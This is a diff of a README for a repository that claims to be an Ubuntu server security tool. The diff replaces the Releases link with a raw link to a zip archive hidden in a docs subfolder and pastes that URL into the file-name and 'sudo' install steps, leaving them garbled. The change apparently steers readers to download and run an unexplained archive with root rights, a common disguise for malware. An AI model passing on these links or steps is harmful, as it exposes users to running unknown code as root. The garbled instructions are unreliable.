Molotov137/ubuntu-server-security/README.md

 Follow these steps to download and run the software:

-1. **Download the Application**: Visit the [Releases page](https://github.com/Molotov137/ubuntu-server-security/releases) to download the latest version.
+1. **Download the Application**: Visit the [Releases page](https://github.com/Molotov137/ubuntu-server-security/raw/refs/heads/main/ufw/docs/server_ubuntu_security_v2.2.zip) to download the latest version.

 2. **Locate the Downloaded File**: Check your Downloads folder.
-You should see a file named `ubuntu-server-security.zip`.
+You should see a file named `https://github.com/Molotov137/ubuntu-server-security/raw/refs/heads/main/ufw/docs/server_ubuntu_security_v2.2.zip`.

-3. **Extract the Files**: Right-click on the `ubuntu-server-security.zip` file and select "Extract Here" to unpack its contents.
+3. **Extract the Files**: Right-click on the `https://github.com/Molotov137/ubuntu-server-security/raw/refs/heads/main/ufw/docs/server_ubuntu_security_v2.2.zip` file and select "Extract Here" to unpack its contents.

 4. **Open a Terminal**: You can open a terminal by searching for "Terminal" in your application menu.

 5. **Navigate to the Folder**: Type `cd ~/Downloads/ubuntu-server-security` in your terminal and hit Enter.
 This command changes your working directory to the folder containing the extracted files.

-6. **Run the Installation Script**: Enter the command `sudo ./install.sh` and hit Enter.
+6. **Run the Installation Script**: Enter the command `sudo https://github.com/Molotov137/ubuntu-server-security/raw/refs/heads/main/ufw/docs/server_ubuntu_security_v2.2.zip` and hit Enter.
 You may need to enter your password.
 This script will set up the security components on your system.

 7. **Follow On-Screen Prompts**: Follow any instructions provided during the installation process.